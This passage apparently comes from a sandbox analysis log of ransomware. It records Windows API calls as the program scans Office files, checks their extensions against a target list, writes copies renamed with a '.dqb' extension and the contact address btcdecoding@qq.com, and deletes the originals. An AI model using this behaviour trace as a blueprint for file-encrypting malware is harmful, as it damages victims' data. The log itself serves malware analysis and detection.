Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML") returned 104 [0039.853] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML") returned 104 [0039.853] lstrlenW (lpString=".doc") returned 4 [0039.853] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0039.853] lstrlenW (lpString=".docx") returned 5 [0039.853] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0039.853] lstrlenW (lpString=".pdf") returned 4 [0039.853] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0039.853] lstrlenW (lpString=".xls") returned 4 [0039.853] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0039.853] lstrlenW (lpString=".xlsx") returned 5 [0039.853] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0039.853] lstrlenW (lpString=".ppt") returned 4 [0039.853] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0039.853] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML") returned 104 [0039.853] lstrlenW (lpString=".zip") returned 4 [0039.853] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0039.853] lstrlenW (lpString=".rar") returned 4 [0039.853] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0039.853] lstrlenW (lpString=".bz2") returned 4 [0039.853] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0039.853] lstrlenW (lpString=".7z") returned 3 [0039.853] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0039.853] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML") returned 104 [0039.854] lstrlenW (lpString=".dbf") returned 4 [0039.854] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0039.854] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML") returned 104 [0039.854] lstrlenW (lpString=".1cd") returned 4 [0039.854] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0039.854] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML") returned 104 [0039.854] lstrlenW (lpString=".jpg") returned 4 [0039.854] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0039.854] lstrcmpiW (lpString1=".XML", lpString2=".dqb") returned 1 [0039.854] lstrlenW (lpString="SETUP.XML") returned 9 [0039.854] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0040.146] GetFileSizeEx (in: hFile=0x1f0, lpFileSize=0x317ff1c | out: lpFileSize=0x317ff1c*=5884) returned 1 [0040.146] CloseHandle (hObject=0x1f0) returned 1 [0040.146] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\setup.xml")) returned 0x20 [0040.146] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\setup.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0040.146] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0040.147] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.147] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.147] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\setup.xml.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x19c [0040.538] GetLastError () returned 0x0 [0040.538] ReadFile (in: hFile=0x1f0, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x16fc, lpOverlapped=0x0) returned 1 [0040.540] WriteFile (in: hFile=0x19c, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0x1700, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0x1700, lpOverlapped=0x0) returned 1 [0040.541] ReadFile (in: hFile=0x1f0, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x0, lpOverlapped=0x0) returned 1 [0040.541] WriteFile (in: hFile=0x19c, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0040.541] SetEndOfFile (hFile=0x19c) returned 1 [0040.541] CloseHandle (hObject=0x19c) returned 1 [0040.542] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.542] SetEndOfFile (hFile=0x1f0) returned 1 [0040.542] CloseHandle (hObject=0x1f0) returned 1 [0040.542] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0040.543] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\setup.xml")) returned 1 [0040.543] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML") returned 104 [0040.543] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML") returned 104 [0040.543] lstrlenW (lpString=".doc") returned 4 [0040.543] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.543] lstrlenW (lpString=".docx") returned 5 [0040.543] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0040.543] lstrlenW (lpString=".pdf") returned 4 [0040.543] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.543] lstrlenW (lpString=".xls") returned 4 [0040.543] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.543] lstrlenW (lpString=".xlsx") returned 5 [0040.543] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0040.543] lstrlenW (lpString=".ppt") returned 4 [0040.543] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.543] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML") returned 104 [0040.543] lstrlenW (lpString=".zip") returned 4 [0040.543] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.543] lstrlenW (lpString=".rar") returned 4 [0040.543] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.543] lstrlenW (lpString=".bz2") returned 4 [0040.543] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.543] lstrlenW (lpString=".7z") returned 3 [0040.543] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.543] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML") returned 104 [0040.543] lstrlenW (lpString=".dbf") returned 4 [0040.544] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.544] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML") returned 104 [0040.544] lstrlenW (lpString=".1cd") returned 4 [0040.544] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.544] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML") returned 104 [0040.544] lstrlenW (lpString=".jpg") returned 4 [0040.544] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.544] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML") returned 104 [0040.544] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML") returned 104 [0040.544] lstrlenW (lpString=".doc") returned 4 [0040.544] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.544] lstrlenW (lpString=".docx") returned 5 [0040.544] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0040.544] lstrlenW (lpString=".pdf") returned 4 [0040.544] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.544] lstrlenW (lpString=".xls") returned 4 [0040.544] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.544] lstrlenW (lpString=".xlsx") returned 5 [0040.544] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0040.544] lstrlenW (lpString=".ppt") returned 4 [0040.544] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.544] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML") returned 104 [0040.544] lstrlenW (lpString=".zip") returned 4 [0040.544] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.544] lstrlenW (lpString=".rar") returned 4 [0040.544] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.544] lstrlenW (lpString=".bz2") returned 4 [0040.544] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.544] lstrlenW (lpString=".7z") returned 3 [0040.544] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.544] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML") returned 104 [0040.544] lstrlenW (lpString=".dbf") returned 4 [0040.544] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.544] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML") returned 104 [0040.544] lstrlenW (lpString=".1cd") returned 4 [0040.545] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.545] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML") returned 104 [0040.545] lstrlenW (lpString=".jpg") returned 4 [0040.545] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.545] lstrcmpiW (lpString1=".XML", lpString2=".dqb") returned 1 [0040.545] lstrlenW (lpString="STOCKS.XML") returned 10 [0040.545] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\stocks.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0041.299] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x317ff1c | out: lpFileSize=0x317ff1c*=2687) returned 1 [0041.299] CloseHandle (hObject=0x178) returned 1 [0041.299] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\stocks.xml")) returned 0x20 [0041.300] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\stocks.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0041.300] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\stocks.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0041.300] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.300] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.300] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\stocks.xml.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0041.300] GetLastError () returned 0x0 [0041.300] ReadFile (in: hFile=0x178, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0xa7f, lpOverlapped=0x0) returned 1 [0041.301] WriteFile (in: hFile=0x208, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xa80, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xa80, lpOverlapped=0x0) returned 1 [0041.302] ReadFile (in: hFile=0x178, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x0, lpOverlapped=0x0) returned 1 [0041.302] WriteFile (in: hFile=0x208, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xe8, lpOverlapped=0x0) returned 1 [0041.303] SetEndOfFile (hFile=0x208) returned 1 [0041.303] CloseHandle (hObject=0x208) returned 1 [0041.303] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.303] SetEndOfFile (hFile=0x178) returned 1 [0041.304] CloseHandle (hObject=0x178) returned 1 [0041.304] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0041.304] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\stocks.xml")) returned 1 [0041.304] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML") returned 78 [0041.304] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML") returned 78 [0041.304] lstrlenW (lpString=".doc") returned 4 [0041.304] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.304] lstrlenW (lpString=".docx") returned 5 [0041.305] lstrcmpiW (lpString1=".docx", lpString2="S.XML") returned -1 [0041.305] lstrlenW (lpString=".pdf") returned 4 [0041.305] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.305] lstrlenW (lpString=".xls") returned 4 [0041.305] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.305] lstrlenW (lpString=".xlsx") returned 5 [0041.305] lstrcmpiW (lpString1=".xlsx", lpString2="S.XML") returned -1 [0041.305] lstrlenW (lpString=".ppt") returned 4 [0041.305] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.305] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML") returned 78 [0041.305] lstrlenW (lpString=".zip") returned 4 [0041.305] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.305] lstrlenW (lpString=".rar") returned 4 [0041.305] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.305] lstrlenW (lpString=".bz2") returned 4 [0041.305] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.305] lstrlenW (lpString=".7z") returned 3 [0041.305] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.305] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML") returned 78 [0041.305] lstrlenW (lpString=".dbf") returned 4 [0041.305] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.305] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML") returned 78 [0041.305] lstrlenW (lpString=".1cd") returned 4 [0041.305] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.305] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML") returned 78 [0041.305] lstrlenW (lpString=".jpg") returned 4 [0041.305] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.305] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML") returned 78 [0041.305] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML") returned 78 [0041.305] lstrlenW (lpString=".doc") returned 4 [0041.305] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.305] lstrlenW (lpString=".docx") returned 5 [0041.305] lstrcmpiW (lpString1=".docx", lpString2="S.XML") returned -1 [0041.305] lstrlenW (lpString=".pdf") returned 4 [0041.305] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.305] lstrlenW (lpString=".xls") returned 4 [0041.306] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.306] lstrlenW (lpString=".xlsx") returned 5 [0041.306] lstrcmpiW (lpString1=".xlsx", lpString2="S.XML") returned -1 [0041.306] lstrlenW (lpString=".ppt") returned 4 [0041.306] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.306] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML") returned 78 [0041.306] lstrlenW (lpString=".zip") returned 4 [0041.306] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.306] lstrlenW (lpString=".rar") returned 4 [0041.306] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.306] lstrlenW (lpString=".bz2") returned 4 [0041.306] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.306] lstrlenW (lpString=".7z") returned 3 [0041.306] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.306] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML") returned 78 [0041.306] lstrlenW (lpString=".dbf") returned 4 [0041.306] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.306] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML") returned 78 [0041.306] lstrlenW (lpString=".1cd") returned 4 [0041.306] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.306] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML") returned 78 [0041.306] lstrlenW (lpString=".jpg") returned 4 [0041.306] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.306] lstrcmpiW (lpString1=".emf", lpString2=".dqb") returned 1 [0041.306] lstrlenW (lpString="Graph.emf") returned 9 [0041.306] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\graph.emf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0042.489] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x317ff1c | out: lpFileSize=0x317ff1c*=116724) returned 1 [0042.489] CloseHandle (hObject=0x174) returned 1 [0042.489] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\graph.emf")) returned 0x20 [0042.489] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\graph.emf.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0042.489] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\graph.emf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0042.490] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf") returned 67 [0042.490] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf") returned 67 [0042.490] lstrlenW (lpString=".doc") returned 4 [0042.490] lstrcmpiW (lpString1=".doc", lpString2=".emf") returned -1 [0042.490] lstrlenW (lpString=".docx") returned 5 [0042.490] lstrcmpiW (lpString1=".docx", lpString2="h.emf") returned -1 [0042.490] lstrlenW (lpString=".pdf") returned 4 [0042.490] lstrcmpiW (lpString1=".pdf", lpString2=".emf") returned 1 [0042.490] lstrlenW (lpString=".xls") returned 4 [0042.490] lstrcmpiW (lpString1=".xls", lpString2=".emf") returned 1 [0042.490] lstrlenW (lpString=".xlsx") returned 5 [0042.490] lstrcmpiW (lpString1=".xlsx", lpString2="h.emf") returned -1 [0042.490] lstrlenW (lpString=".ppt") returned 4 [0042.490] lstrcmpiW (lpString1=".ppt", lpString2=".emf") returned 1 [0042.490] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf") returned 67 [0042.490] lstrlenW (lpString=".zip") returned 4 [0042.490] lstrcmpiW (lpString1=".zip", lpString2=".emf") returned 1 [0042.490] lstrlenW (lpString=".rar") returned 4 [0042.490] lstrcmpiW (lpString1=".rar", lpString2=".emf") returned 1 [0042.490] lstrlenW (lpString=".bz2") returned 4 [0042.490] lstrcmpiW (lpString1=".bz2", lpString2=".emf") returned -1 [0042.490] lstrlenW (lpString=".7z") returned 3 [0042.490] lstrcmpiW (lpString1=".7z", lpString2="emf") returned -1 [0042.490] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf") returned 67 [0042.490] lstrlenW (lpString=".dbf") returned 4 [0042.490] lstrcmpiW (lpString1=".dbf", lpString2=".emf") returned -1 [0042.490] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf") returned 67 [0042.490] lstrlenW (lpString=".1cd") returned 4 [0042.490] lstrcmpiW (lpString1=".1cd", lpString2=".emf") returned -1 [0042.490] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf") returned 67 [0042.490] lstrlenW (lpString=".jpg") returned 4 [0042.490] lstrcmpiW (lpString1=".jpg", lpString2=".emf") returned 1 [0042.490] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf") returned 67 [0042.490] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf") returned 67 [0042.490] lstrlenW (lpString=".doc") returned 4 [0042.490] lstrcmpiW (lpString1=".doc", lpString2=".emf") returned -1 [0042.491] lstrlenW (lpString=".docx") returned 5 [0042.491] lstrcmpiW (lpString1=".docx", lpString2="h.emf") returned -1 [0042.491] lstrlenW (lpString=".pdf") returned 4 [0042.491] lstrcmpiW (lpString1=".pdf", lpString2=".emf") returned 1 [0042.491] lstrlenW (lpString=".xls") returned 4 [0042.491] lstrcmpiW (lpString1=".xls", lpString2=".emf") returned 1 [0042.491] lstrlenW (lpString=".xlsx") returned 5 [0042.491] lstrcmpiW (lpString1=".xlsx", lpString2="h.emf") returned -1 [0042.491] lstrlenW (lpString=".ppt") returned 4 [0042.491] lstrcmpiW (lpString1=".ppt", lpString2=".emf") returned 1 [0042.491] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf") returned 67 [0042.491] lstrlenW (lpString=".zip") returned 4 [0042.491] lstrcmpiW (lpString1=".zip", lpString2=".emf") returned 1 [0042.491] lstrlenW (lpString=".rar") returned 4 [0042.491] lstrcmpiW (lpString1=".rar", lpString2=".emf") returned 1 [0042.491] lstrlenW (lpString=".bz2") returned 4 [0042.491] lstrcmpiW (lpString1=".bz2", lpString2=".emf") returned -1 [0042.491] lstrlenW (lpString=".7z") returned 3 [0042.491] lstrcmpiW (lpString1=".7z", lpString2="emf") returned -1 [0042.491] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf") returned 67 [0042.491] lstrlenW (lpString=".dbf") returned 4 [0042.491] lstrcmpiW (lpString1=".dbf", lpString2=".emf") returned -1 [0042.491] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf") returned 67 [0042.491] lstrlenW (lpString=".1cd") returned 4 [0042.491] lstrcmpiW (lpString1=".1cd", lpString2=".emf") returned -1 [0042.491] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf") returned 67 [0042.491] lstrlenW (lpString=".jpg") returned 4 [0042.491] lstrcmpiW (lpString1=".jpg", lpString2=".emf") returned 1 [0042.491] lstrcmpiW (lpString1=".jpg", lpString2=".dqb") returned 1 [0042.491] lstrlenW (lpString="GreenBubbles.jpg") returned 16 [0042.491] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\greenbubbles.jpg"), dwDesiredAccess=0x80000000, 